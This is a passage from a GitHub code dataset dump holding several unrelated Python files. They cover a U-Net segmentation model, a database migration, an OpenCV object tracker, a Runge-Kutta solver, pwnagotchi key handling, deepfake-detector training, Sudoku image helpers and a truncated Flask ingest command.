tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass UnetModel(tf.keras.Model):\n def __init__(self, seed):\n super().__init__()\n\n self._seed = seed\n self._segmentation_classes = 4\n self._inner_features = 8\n\n ### Define the UNet model ###\n\n # https://lmb.informatik.uni-freiburg.de/people/ronneber/u-net/u-net-architecture.png\n\n def upsample(output_features, x):\n # TODO: try experimenting with different upsamplings\n # a) transposed upconv\n # b) bilinear interpolation\n # ...\n x = tf.keras.layers.UpSampling2D(interpolation=\"nearest\")(x)\n return tf.keras.layers.Conv2D(\n output_features, kernel_size=1,\n activation=\"relu\", padding=\"same\"\n )(x)\n\n def unet_level(depth, max_depth, x):\n level_features = self._inner_features * (1 << depth)\n \n x = tf.keras.layers.Conv2D(\n level_features, kernel_size=3,\n activation=\"relu\", padding=\"same\"\n )(x)\n x = tf.keras.layers.Conv2D(\n level_features, kernel_size=3,\n activation=\"relu\", padding=\"same\"\n )(x)\n\n if depth == max_depth: # lowest level stops the recursion\n return x\n \n skip_connection = x\n \n x = tf.keras.layers.MaxPool2D()(x)\n x = unet_level(depth + 1, max_depth, x)\n x = upsample(output_features=level_features, x=x)\n \n x = tf.concat((skip_connection, x), axis=3)\n \n x = tf.keras.layers.Conv2D(\n level_features, kernel_size=3,\n activation=\"relu\", padding=\"same\"\n )(x)\n x = tf.keras.layers.Conv2D(\n level_features, kernel_size=3,\n activation=\"relu\", padding=\"same\"\n )(x)\n\n return x\n\n # input image\n unet_input = tf.keras.layers.Input(\n shape=(28, 28, 1),\n name=\"unet_input\"\n )\n\n # unet\n x = unet_level(depth=0, max_depth=2, x=unet_input)\n\n # reshape to output classes (sigmoid conv 1x1)\n unet_output = tf.keras.layers.Conv2D(\n self._segmentation_classes, kernel_size=1,\n activation=\"sigmoid\", padding=\"same\"\n )(x)\n\n # define the model (in two output variants)\n self.unet = tf.keras.Model(\n inputs=unet_input,\n outputs=unet_output,\n name=\"unet\"\n )\n\n # print the model\n tf.keras.utils.plot_model(self.unet, \"model.png\", show_shapes=True)\n\n # TODO:\n # image -> seg mask\n # seg mask -> seg mask, identity on the same model\n # (but only with the k-most prominent masks)\n # a) on the mask as is\n # b) on the mask with noise where zero\n\n @tf.function\n def train_step(self, batch):\n images, labels = batch\n\n @tf.function\n def build_mask_inputs_slice(batch_slice):\n class_prominences = tf.math.reduce_sum(batch_slice, axis=(0, 1))\n largest_class_index = tf.math.argmax(class_prominences)\n return batch_slice[:, :, largest_class_index]\n\n @tf.function\n def build_mask_outputs_slice(batch_slice):\n class_prominences = tf.math.reduce_sum(batch_slice, axis=(0, 1))\n largest_class_index = tf.math.argmax(class_prominences)\n\n batch_slice_transposed = tf.transpose(batch_slice, [2, 0, 1])\n outputs_slice_transposed = tf.tensor_scatter_nd_update(\n tf.zeros(\n shape=batch_slice_transposed.shape,\n dtype=batch_slice_transposed.dtype\n ),\n indices=[[largest_class_index]],\n updates=[batch_slice_transposed[largest_class_index]]\n )\n outputs_slice = tf.transpose(outputs_slice_transposed, [1, 2, 0])\n\n return outputs_slice\n\n with tf.GradientTape() as tape:\n \n ### Segmentation pass ###\n\n pass_1_input = images\n pass_1_output = self.unet(images, training=True)\n\n ### Mask training pass ###\n\n # pass_2_input = tf.map_fn(\n # build_mask_inputs_slice,\n # pass_1_output\n # )\n # pass_2_expected_output = tf.map_fn(\n # build_mask_outputs_slice,\n # pass_1_output\n # )\n # pass_2_actual_output = self.unet(pass_2_input, training=True)\n\n ### Compute losses ###\n\n # all masks should reconstruct the input image\n identity_loss = self.compiled_loss(\n y_true=tf.concat(\n [pass_1_input * 0] + \n [pass_1_input for _ in range(self._segmentation_classes - 1)],\n axis=3\n ),\n #y_true = pass_1_input,\n y_pred=pass_1_output,\n regularization_losses=self.losses\n )\n # identity_loss = tf.losses.BinaryCrossentropy(from_logits=False)(\n # y_true=tf.stack(\n # [pass_1_input for _ in range(self._segmentation_classes)],\n # axis=3\n # ),\n # y_pred=pass_1_output\n # )\n\n # masks should (when combined) reconstruct the image\n # reconstruction_loss = tf.losses.BinaryCrossentropy(from_logits=True)(\n # y_true=pass_1_input,\n # y_pred=tf.expand_dims(\n # tf.reduce_sum(pass_1_output_logits, axis=3),\n # axis=3\n # )\n # )\n\n # mask should be classified into its own class\n # mask_stabilization_loss = tf.losses.BinaryCrossentropy(from_logits=False)(\n # y_true=pass_2_expected_output,\n # y_pred=pass_2_actual_output\n # )\n\n # the proper mask should light up the most\n # supervised_loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)(\n # y_true=labels,\n # y_pred=tf.reduce_mean(pass_1_output_logits, axis=(1, 2))\n # )\n \n def prepare_sup_output(args):\n input_slice, label = args\n channel_stack = tf.concat(\n [\n #input_slice\n input_slice * tf.cond(\n tf.constant(i, dtype=tf.int64) == label,\n lambda: 1.0,\n lambda: 0.0\n )\n for i in range(self._segmentation_classes)\n ],\n axis=2\n )\n return channel_stack, label\n\n supervised_output, _ = tf.map_fn(\n fn=prepare_sup_output,\n elems=(pass_1_input, labels)\n )\n \n supervised_loss = tf.losses.BinaryCrossentropy(from_logits=False)(\n y_true=supervised_output,\n y_pred=pass_1_output\n )\n\n #loss = reconstruction_loss + mask_stabilization_loss\n loss = supervised_loss\n\n gradients = tape.gradient(loss, self.trainable_weights)\n self.optimizer.apply_gradients(zip(gradients, self.trainable_weights))\n\n return {\n # \"reconstruction_loss\": reconstruction_loss,\n # \"mask_stabilization_loss\": mask_stabilization_loss,\n # \"identity_loss\": identity_loss,\n # \"supervised_loss\": supervised_loss,\n \"loss\": loss\n }\n\n def scatter(self, epoch, images, labels):\n masks = self.unet(images, training=False)\n \n graphics = []\n for i in range(images.shape[0]):\n image = images[i]\n image_masks = masks[i]\n image_masks_transposed = tf.transpose(image_masks, [2, 0, 1])\n graphic = tf.concat(\n [image[:,:,0]] + [t for t in image_masks_transposed],\n axis=1\n ).numpy()\n graphic[:,27] = 1 # draw a separation line\n graphics.append(graphic)\n\n final_graphic = np.concatenate(graphics, axis=0)\n\n # save the image\n plt.figure(figsize=(10, 10))\n plt.imshow(np.dstack([final_graphic, final_graphic, final_graphic]))\n plt.savefig(\n \"fig/masks-{:02d}.png\".format(epoch),\n bbox_inches=\"tight\"\n )\n plt.clf()\n","repo_name":"Jirka-Mayer/MasterThesis","sub_path":"playground/04-unet-seg/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"28395388522","text":"\"\"\"empty message\n\nRevision ID: 481d9eabc6e7\nRevises: 2dbe78a7948b\nCreate Date: 2016-10-08 21:18:30.878842\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '481d9eabc6e7'\ndown_revision = '2dbe78a7948b'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_comments_label'), 'comments', ['label'], unique=False)\n op.create_index(op.f('ix_comments_time'), 'comments', ['time'], unique=False)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_comments_time'), table_name='comments')\n op.drop_index(op.f('ix_comments_label'), table_name='comments')\n ### end Alembic commands ###\n","repo_name":"tentangdata/ig","sub_path":"migrations/versions/481d9eabc6e7_.py","file_name":"481d9eabc6e7_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33713830458","text":"def go(idx, tmp):\r\n if dic[idx] not in tmp:\r\n tmp.append(dic[idx])\r\n go(dic[idx], tmp)\r\n return tmp\r\n\r\nn = int(input())\r\ndic = {}\r\nfor i in range(1, n+1):\r\n dic[i] = int(input())\r\n\r\nres = {}\r\nfor i in range(1, n+1):\r\n tmp = [i]\r\n tmp.append(dic[i])\r\n res[i] = go(dic[i], tmp)\r\n\r\nresult = []\r\nfor i in res.keys():\r\n result.append([i, len(res[i])])\r\n\r\nresult.sort(key=lambda x:(-x[1],x[0]))\r\nprint(result[0][0])","repo_name":"aeriheo/study","sub_path":"3월 5주차/BOJ_3182.py","file_name":"BOJ_3182.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40600800780","text":"from hammiu import CentroidTracker\nimport imutils\nimport argparse\nimport time\nimport time \nimport cv2\nimport numpy as np\n\n\"\"\"Bài này có thể chọn nhiều face detector như YOLO...\"\"\"\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--prototxt\", required=True, help=\"path to Caffe 'deploy' prototxt file\")\nap.add_argument(\"-m\", \"--model\", required=True, help=\"path to Caffe pre-trained model\")\nap.add_argument(\"-c\", \"--confidence\", type=float, default=0.5, help=\"minimum probability to filter weak detections\")\nargs = vars(ap.parse_args())\n\n# khởi tạo centroid tracker và frame dimensions\nct = CentroidTracker()\n(H, W) = (None, None)\n\n# load model\nprint(\"[INFO] loading model...\")\nnet = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\n\n# load webcam\nvideo = cv2.VideoCapture(0)\n\n# lấy các frames\nwhile True:\n ok, frame = video.read()\n\n # ko lấy được frame\n if not ok:\n break\n\n # resize lại chạy cho nhanh\n # frame = imutils.resize(frame, width=500)\n\n # laays dimensions of frames nếu None\n if H is None and W is None:\n (H, W) = frame.shape[:2]\n\n # tạo blob từ image - tạo input vào mạng\n blob = cv2.dnn.blobFromImage(frame, 1.0, (W, H), (104.0, 177.0, 123.0))\n # truyền blob vào mạng, nhận được predictions, khởi tạo list chứa bounding boxes\n net.setInput(blob)\n detections = net.forward()\n rects = []\n\n # Duyệt qua các dự đoán/phát hiện\n for i in range(0, detections.shape[2]):\n # lọc các detection có prob nhỏ, cái n��o lớn mới dùng\n if detections[0, 0, i, 2] > args[\"confidence\"]:\n # xác định (x, y) của bounding box rồi cập nhật vào rects\n box = detections[0, 0, i, 3:7] * np.array([W, H, W, H])\n rects.append(box.astype(\"int\")) # chuyển về int do pixel\n\n # vẽ bounding box quanh object để có thể biểu diễn chúng\n (startX, startY, endX, endY) = box.astype(\"int\")\n cv2.rectangle(frame, (startX, startY), (endX, endY), (0, 255, 0), 2)\n \n # update centroid tracker bằng các bounding boxes vừa tính\n objects = ct.update(rects)\n\n # duyệt qua các tracked objects\n for (objectID, centroid) in objects.items():\n # vẽ ID của object và centroid lên frame\n text = \"ID {}\".format(objectID)\n cv2.putText(frame, text, (centroid[0] - 10, centroid[1] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n if key == ord(\"q\"):\n break \n\ncv2.destroyAllWindows()\nvideo.release()\n\n\n \n ","repo_name":"huytranvan2010/Simple-Object-Tracking-with-OpenCV","sub_path":"object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73610327207","text":"import os\nfrom rackio_AI import RackioAI\nfrom rackio import Rackio\n\napp = Rackio()\n\nRackioAI(app)\n\nos.chdir('../..')\ncwd = os.getcwd()\n# filename is a Directory, from that directory it will load all .tpl files\nfilename = os.path.join(cwd, 'rackio_AI', 'data', 'Leak')\n\nRackioAI.load(filename)\n\nprint(RackioAI.data)","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/examples/example6.py","file_name":"example6.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74015767209","text":"from math import sqrt, exp, cos, sin\nimport matplotlib.pyplot as plt\n\n\ndef RungeKutta4(x0, xn, y0, z0, h):\n n = int((xn - x0)/h)\n # Containers for solutions\n xlist = [0] * (n + 1)\n ylist = [0] * (n + 1)\n zlist = [0] * (n + 1)\n\n xlist[0] = x = x0\n ylist[0] = y = y0\n zlist[0] = z = z0\n\n for i in range(1, n + 1):\n # see https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_methods\n k1 = h * f(x, y, z)\n l1 = h * g(x, y, z)\n k2 = h * f(x + 0.5 * h, y + 0.5 * k1, z + 0.5*l1)\n l2 = h * g(x + 0.5 * h, y + 0.5 * k1, z + 0.5*l1)\n k3 = h * f(x + 0.5 * h, y + 0.5 * k2, z + 0.5*l2)\n l3 = h * g(x + 0.5 * h, y + 0.5 * k2, z + 0.5*l2)\n k4 = h * f(x + h, y + k2, z + l2)\n l4 = h * g(x + h, y + k2, z + l2)\n xlist[i] = x = x0 + i * h\n ylist[i] = y = y + (k1 + 2*k2 + 2*k3 + k4) / 6\n zlist[i] = z = z + (l1 + 2*l2 + 2*l3 + l4) / 6\n\n return xlist, ylist\n\n\ndef g(x, y, z):\n # z' = 4y\n return 4*y\n\n\ndef f(x, y, z):\n # y' = z\n return z\n\n\ndef exact(x):\n # analytical solution y = exp(2*x)\n return exp(2*x)\n\n\ndef plot(x1, y1, x2, y2, color1, color2, linestyle1, linestyle2, h):\n dpi = 80\n fig = plt.figure(dpi=dpi, figsize=(1600 / dpi, 900 / dpi))\n\n plt.plot(x1, y1, color=color1, linestyle=linestyle1,\n label='Numerical Solution')\n plt.plot(x2, y2, color=color2, linestyle=linestyle2,\n label='Analytical Solution')\n equation = \"y'' - 4y = 0\"\n name = \"Gordievich Kirill\"\n university = \"SMTU\"\n title = '%s, h = %s, The Runge–Kutta method by %s, %s' %(equation, h, name, university)\n plt.title(title, fontsize=20)\n plt.xlabel('x', fontsize=20)\n plt.ylabel('y', fontsize=20)\n plt.legend(loc='upper right')\n plt.show()\n \n # Uncomment the following to print the figure:\n #file_name = str(h1) + '_2_RungeKutta4.png'\n #fig.savefig(file_name)","repo_name":"KirillGordievich/The-4th-order-Runge-Kutta-method-for-a-2nd-order-ODE","sub_path":"rungeKutta.py","file_name":"rungeKutta.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18076368233","text":"from Crypto.Signature import PKCS1_PSS\nfrom Crypto.PublicKey import RSA\nimport Crypto.Hash.SHA256 as SHA256\nimport base64\nimport hashlib\nimport os\nimport logging\n\nDefaultPath = \"/etc/pwnagotchi/\"\n\n\nclass KeyPair(object):\n def __init__(self, path=DefaultPath, view=None):\n self.path = path\n self.priv_path = os.path.join(path, \"id_rsa\")\n self.priv_key = None\n self.pub_path = \"%s.pub\" % self.priv_path\n self.pub_key = None\n self.fingerprint_path = os.path.join(path, \"fingerprint\")\n self._view = view\n\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n while True:\n # first time, generate new keys\n if not os.path.exists(self.priv_path) or not os.path.exists(self.pub_path):\n self._view.on_keys_generation()\n logging.info(\"generating %s ...\" % self.priv_path)\n os.system(\"pwngrid -generate -keys '%s'\" % self.path)\n\n # load keys: they might be corrupted if the unit has been turned off during the generation, in this case\n # the exception will remove the files and go back at the beginning of this loop.\n try:\n with open(self.priv_path) as fp:\n self.priv_key = RSA.importKey(fp.read())\n\n with open(self.pub_path) as fp:\n self.pub_key = RSA.importKey(fp.read())\n self.pub_key_pem = self.pub_key.exportKey('PEM').decode(\"ascii\")\n # python is special\n if 'RSA PUBLIC KEY' not in self.pub_key_pem:\n self.pub_key_pem = self.pub_key_pem.replace('PUBLIC KEY', 'RSA PUBLIC KEY')\n\n pem_ascii = self.pub_key_pem.encode(\"ascii\")\n\n self.pub_key_pem_b64 = base64.b64encode(pem_ascii).decode(\"ascii\")\n self.fingerprint = hashlib.sha256(pem_ascii).hexdigest()\n\n with open(self.fingerprint_path, 'w+t') as fp:\n fp.write(self.fingerprint)\n\n # no exception, keys loaded correctly.\n self._view.on_starting()\n return\n\n except Exception as e:\n # if we're here, loading the keys broke something ...\n logging.exception(\"error loading keys, maybe corrupted, deleting and regenerating ...\")\n try:\n os.remove(self.priv_path)\n os.remove(self.pub_path)\n except:\n pass\n\n def sign(self, message):\n hasher = SHA256.new(message.encode(\"ascii\"))\n signer = PKCS1_PSS.new(self.priv_key, saltLen=16)\n signature = signer.sign(hasher)\n signature_b64 = base64.b64encode(signature).decode(\"ascii\")\n return signature, signature_b64\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"2603641523","text":"import os\nimport time\nimport logging\nimport warnings\nimport numpy \nimport torch\nimport torch.nn as nn\nimport torch.multiprocessing as mp\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nimport torch.distributed as dist\nfrom models.MAT import MAT\nfrom datasets.dataset import DeepfakeDataset\nfrom AGDA import AGDA\nimport cv2\nfrom utils import dist_average,ACC\n#from torch.utils.tensorboard import SummaryWriter\ncv2.setNumThreads(0)\ncv2.ocl.setUseOpenCL(False)\n# GPU settings\nassert torch.cuda.is_available()\n#torch.autograd.set_detect_anomaly(True)\ndef load_state(net,ckpt):\n sd=net.state_dict()\n nd={}\n goodmatch=True\n for i in ckpt:\n if i in sd and sd[i].shape==ckpt[i].shape:\n nd[i]=ckpt[i]\n #print(i)\n else:\n print('fail to load %s'%i)\n goodmatch=False\n net.load_state_dict(nd,strict=False)\n return goodmatch\ndef main_worker(local_rank,world_size,rank_offset,config):\n rank=local_rank+rank_offset\n if rank==0:\n logging.basicConfig(\n filename=os.path.join('runs', config.name,'train.log'),\n filemode='a',\n format='%(asctime)s: %(levelname)s: [%(filename)s:%(lineno)d]: %(message)s',\n level=logging.INFO)\n warnings.filterwarnings(\"ignore\")\n dist.init_process_group(backend='nccl', init_method=config.url,world_size=world_size, rank=rank)\n # if rank==0:\n # try:\n # os.remove('/tmp/.pytorch_distribute')\n # except:\n # pass\n numpy.random.seed(1234567)\n torch.manual_seed(1234567)\n torch.cuda.manual_seed(1234567)\n torch.cuda.set_device(local_rank)\n train_dataset = DeepfakeDataset(phase='train',**config.train_dataset)\n validate_dataset=DeepfakeDataset(phase='test',**config.val_dataset)\n train_sampler=torch.utils.data.distributed.DistributedSampler(train_dataset)\n validate_sampler=torch.utils.data.distributed.DistributedSampler(validate_dataset)\n train_loader=torch.utils.data.DataLoader(train_dataset, batch_size=config.batch_size,sampler=train_sampler,pin_memory=True,num_workers=config.workers)\n validate_loader=torch.utils.data.DataLoader(validate_dataset, batch_size=config.batch_size,sampler=validate_sampler,pin_memory=True,num_workers=config.workers)\n logs = {}\n start_epoch = 0\n net = MAT(**config.net_config)\n for i in config.freeze:\n if 'backbone' in i:\n net.net.requires_grad_(False)\n elif 'attention' in i:\n net.attentions.requires_grad_(False)\n elif 'feature_center' in i:\n net.auxiliary_loss.alpha=0\n elif 'texture_enhance' in i:\n net.texture_enhance.requires_grad_(False)\n elif 'fcs' in i:\n net.projection_local.requires_grad_(False)\n net.project_final.requires_grad_(False)\n net.ensemble_classifier_fc.requires_grad_(False)\n else:\n if 'xception' in str(type(net.net)):\n for j in net.net.seq:\n if j[0]==i:\n for t in j[1]:\n t.requires_grad_(False)\n \n if 'EfficientNet' in str(type(net.net)):\n if i=='b0':\n net.net._conv_stem.requires_grad_(False)\n stage_map=net.net.stage_map\n for c in range(len(stage_map)-2,-1,-1):\n if not stage_map[c]:\n stage_map[c]=stage_map[c+1]\n for c1,c2 in zip(stage_map,net.net._blocks):\n if c1==i:\n c2.requires_grad_(False)\n\n net=nn.SyncBatchNorm.convert_sync_batchnorm(net).to(local_rank)\n net = nn.parallel.DistributedDataParallel(net,device_ids=[local_rank],output_device=local_rank,find_unused_parameters=True)\n AG=AGDA(**config.AGDA_config).to(local_rank)\n optimizer = torch.optim.AdamW(net.parameters(), lr=config.learning_rate, betas=config.adam_betas, weight_decay=config.weight_decay)\n scheduler=torch.optim.lr_scheduler.StepLR(optimizer, step_size=config.scheduler_step, gamma=config.scheduler_gamma)\n if config.ckpt:\n loc = 'cuda:{}'.format(local_rank)\n checkpoint = torch.load(config.ckpt, map_location=loc)\n logs = checkpoint['logs']\n start_epoch = int(logs['epoch'])+1\n if load_state(net.module,checkpoint['state_dict']) and config.resume_optim:\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n try:\n scheduler.load_state_dict(checkpoint['scheduler_state'])\n except:\n pass\n else:\n net.module.auxiliary_loss.alpha=torch.tensor(config.alpha)\n del checkpoint\n torch.cuda.empty_cache()\n for epoch in range(start_epoch, config.epochs):\n logs['epoch'] = epoch\n train_sampler.set_epoch(epoch)\n train_sampler.dataset.next_epoch()\n run(logs=logs,data_loader=train_loader,net=net,optimizer=optimizer,local_rank=local_rank,config=config,AG=AG,phase='train')\n run(logs=logs,data_loader=validate_loader,net=net,optimizer=optimizer,local_rank=local_rank,config=config,phase='valid')\n net.module.auxiliary_loss.alpha*=config.alpha_decay\n scheduler.step()\n if local_rank==0:\n torch.save({\n 'logs': logs,\n 'state_dict': net.module.state_dict(),\n 'optimizer_state': optimizer.state_dict(),\n 'scheduler_state':scheduler.state_dict()}, 'checkpoints/'+config.name+'/ckpt_%s.pth'%epoch)\n dist.barrier()\n\ndef train_loss(loss_pack,config):\n if 'loss' in loss_pack:\n return loss_pack['loss']\n loss=config.ensemble_loss_weight*loss_pack['ensemble_loss']+config.aux_loss_weight*loss_pack['aux_loss']\n if config.AGDA_loss_weight!=0:\n loss+=config.AGDA_loss_weight*loss_pack['AGDA_ensemble_loss']+config.match_loss_weight*loss_pack['match_loss']\n return loss\n \ndef run(logs,data_loader,net,optimizer,local_rank,config,AG=None,phase='train'):\n if local_rank==0:\n print('start ',phase)\n if config.AGDA_loss_weight==0:\n AG=None\n recorder={}\n if config.feature_layer=='logits':\n record_list=['loss','acc']\n else:\n record_list=['ensemble_loss','aux_loss','ensemble_acc']\n if AG is not None:\n record_list+=['AGDA_ensemble_loss','match_loss']\n for i in record_list:\n recorder[i]=dist_average(local_rank)\n # begin training\n start_time = time.time()\n if phase=='train':\n net.train()\n else: net.eval()\n for i, (X, y) in enumerate(data_loader):\n X = X.to(local_rank,non_blocking=True)\n y = y.to(local_rank,non_blocking=True)\n with torch.set_grad_enabled(phase=='train'):\n loss_pack=net(X,y,train_batch=True,AG=AG)\n if phase=='train':\n batch_loss = train_loss(loss_pack,config)\n batch_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n with torch.no_grad():\n if config.feature_layer=='logits':\n loss_pack['acc']=ACC(loss_pack['logits'],y)\n else:\n loss_pack['ensemble_acc']=ACC(loss_pack['ensemble_logit'],y)\n for i in record_list:\n recorder[i].step(loss_pack[i])\n\n # end of this epoch\n batch_info=[]\n for i in record_list:\n mesg=recorder[i].get()\n logs[i]=mesg\n batch_info.append('{}:{:.4f}'.format(i,mesg))\n end_time = time.time()\n\n # write log for this epoch\n if local_rank==0:\n logging.info('{}: {}, Time {:3.2f}'.format(phase,' '.join(batch_info), end_time - start_time))\n\n\ndef distributed_train(config,world_size=0,num_gpus=0,rank_offset=0):\n if not num_gpus:\n num_gpus = torch.cuda.device_count()\n if not world_size:\n world_size=num_gpus\n mp.spawn(main_worker, nprocs=num_gpus, args=(world_size,rank_offset,config))\n torch.cuda.empty_cache()\n","repo_name":"yoctta/multiple-attention","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"53"} +{"seq_id":"40720755952","text":"import cv2 as cv\nimport numpy as np\n\nimport os\n\nfrom .img_prep import prep_box\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\nimport tensorflow as tf\n\n\ndef digit_recognition(boxes, photo=False):\n \"\"\"\n Recognizes the value of a digit inside a bounding box. Digit recognition model uses the MNIST dataset with added\n personal characters. Empty images are given a value of zero.\n\n :param boxes: Images that have a digit centralized.\n :param photo: True is original image is a photo, False otherwise.\n :type photo: bool\n :return: 81 values recognized in image.\n :rtype: list\n \"\"\"\n # Loading digit recognition model and creating an empty list to store numbers found\n model = tf.keras.models.load_model('sudoku/utils/new_number_reader.model')\n nums_found = []\n\n for box in boxes:\n # Centering digits in bounding boxes and changing array format.\n if photo:\n box_prep = prep_box(box, photo=True)\n else:\n box_prep = prep_box(box)\n\n # Applying digit recognition model to image.\n prediction = model.predict(box_prep)\n\n # Selecting the digit with the highest probability and the probability value.\n class_idx = np.argmax(prediction, axis=-1)\n probability = np.amax(prediction)\n\n # Establishing minimum probability value for digit to get appended. Appending zero if value is not reached.\n if probability > 0.70:\n nums_found.append(class_idx[0])\n else:\n nums_found.append(0)\n\n return nums_found\n\n\ndef display_numbers(image, numbers, color=(0, 255, 0)):\n \"\"\"\n Places a digit in a specific area of an image. Values of zero will be ignored and given an empty space.\n\n :param image: Desired image to overlay digits on.\n :type image: src\n :param numbers: Digits to be displayed on image.\n :type numbers: list\n :param color: Decimal code for desired color of digits to be displayed. Default color is green.\n :return: Original image with desired digits put on image.\n \"\"\"\n # Creating the dimensions that each digit will take up in the image.\n sec_w = int(image.shape[1] / 9)\n sec_h = int(image.shape[0] / 9)\n\n # Looping over Sudoku matrix values\n for row_idx in range(0, 9):\n for col_idx in range(0, 9):\n\n # Controlling so iterations skip index values that contain zero.\n if numbers[(col_idx * 9) + row_idx] != 0:\n # Putting digit on section of image.\n cv.putText(img=image,\n text=str(numbers[(col_idx * 9) + row_idx]),\n org=(row_idx * sec_w + int(sec_w / 2) - 10, int((col_idx + 0.8) * sec_h)),\n fontFace=cv.FONT_HERSHEY_COMPLEX_SMALL,\n fontScale=2,\n color=color,\n thickness=2,\n lineType=cv.LINE_AA)\n return image\n\n\ndef modified_array(nums_scanned, solution_nums):\n \"\"\"\n Determines if a value is shared between two lists at a specific index value. Values that are shared are replaced\n with zero.\n\n :param nums_scanned: Sudoku puzzle numbers with zero representing empty spaces.\n :type nums_scanned: ndarray\n :param solution_nums: All the numbers for the solution of Sudoku puzzle. No zeros.\n :type solution_nums: ndarray\n :return: Only the solution values of the Sudoku puzzle\n :rtype: list\n \"\"\"\n # Initializing empty list to store values.\n not_shared = []\n\n for idx, value in enumerate(solution_nums):\n\n # Adding zero if values match. If they do not, adding the value in solution_nums to not_shared.\n if nums_scanned[idx] == solution_nums[idx]:\n not_shared.append(0)\n else:\n not_shared.append(value)\n\n return not_shared\n\n\ndef stack_images(scale, img_array):\n \"\"\"\n Takes in multiple images and stacks them horizontally and vertically to create a new image. If images do not share\n the same dimensions, images are scaled to the dimensions of the first image in the inputted tuple.\n\n :param scale: Value to enlarge or reduce input images.\n :type scale: float\n :param img_array: Tuple of lists containing desired images. The number of lists inside tuple represent how many rows\n of images the final output will have. The number of images inside a list represent the number of columns. All\n lists must be of equal length. Input an empty image if length are not the same.\n :type img_array: any\n :return: A new image composed of all the images in img_array.\n \"\"\"\n # Finding the total number of rows and columns that will make up the final image.\n rows = len(img_array)\n cols = len(img_array[0])\n\n # Determining if first variable in tuple is a list or just an image.\n rows_available = isinstance(img_array[0], list)\n\n # Finding the dimension of the first image in the inputted tuple.\n width = img_array[0][0].shape[1]\n height = img_array[0][0].shape[0]\n\n # Control that determines if final image will have multiple rows or just one.\n if rows_available:\n for x in range(0, rows):\n for y in range(0, cols):\n\n # Converting dimensions of current image when they do not match the first. And, applying desired scale.\n if img_array[x][y].shape[:2] == img_array[0][0].shape[:2]:\n img_array[x][y] = cv.resize(img_array[x][y],\n dsize=(0, 0), # Can be changed to None\n fx=scale,\n fy=scale)\n else:\n img_array[x][y] = cv.resize(img_array[x][y],\n dsize=(img_array[0][0].shape[1], img_array[0][0].shape[0]),\n fx=scale,\n fy=scale)\n\n # Converting black and white images to ensure they contain three color channels.\n if len(img_array[x][y].shape) == 2:\n img_array[x][y] = cv.cvtColor(img_array[x][y], cv.COLOR_GRAY2BGR)\n\n # Creating a list of black images that length is equal to the user desired number of rows.\n image_blank = np.zeros((height, width, 3), np.uint8)\n hor = [image_blank] * rows\n\n # Replacing black images with a horizontal stack of the images in an element of the inputted tuple.\n for x in range(0, rows):\n hor[x] = np.hstack(img_array[x])\n\n # Vertically stacking the horizontal stacks of images previously created to develop one image.\n ver = np.vstack(hor)\n\n else:\n for x in range(0, rows):\n\n # Converting dimensions of current image when they do not match the first. And, applying desired scale.\n if img_array[x].shape[:2] == img_array[0].shape[:2]:\n img_array[x] = cv.resize(img_array[x],\n dsize=(0, 0),\n fx=scale,\n fy=scale)\n else:\n img_array[x] = cv.resize(img_array[x],\n dsize=(img_array[0].shape[1], img_array[0].shape[0]),\n fx=scale,\n fy=scale)\n\n # Converting black and white images to ensure they contain three color channels.\n if len(img_array[x].shape) == 2:\n img_array[x] = cv.cvtColor(img_array[x], cv.COLOR_GRAY2BGR)\n\n # Horizontally stacking images in the inputted tuple.\n hor = np.hstack(img_array)\n ver = hor\n\n return ver\n","repo_name":"jrobles32/Simple_Games","sub_path":"sudoku/img_sudoku/img_helpers.py","file_name":"img_helpers.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14788634046","text":"# -*- coding: utf-8 -*-\n\"\"\"\n commands.ingest\n ~~~~~~~~~~~~~~\n a command for csv ingestion\n\"\"\"\nimport click\nfrom flask.cli import AppGroup\nfrom .helpers import ingest_csv\n\ningest_cli = AppGroup('ingest')\n\n\n@ingest_cli.command('csv')\n@click.option('--table', help='The 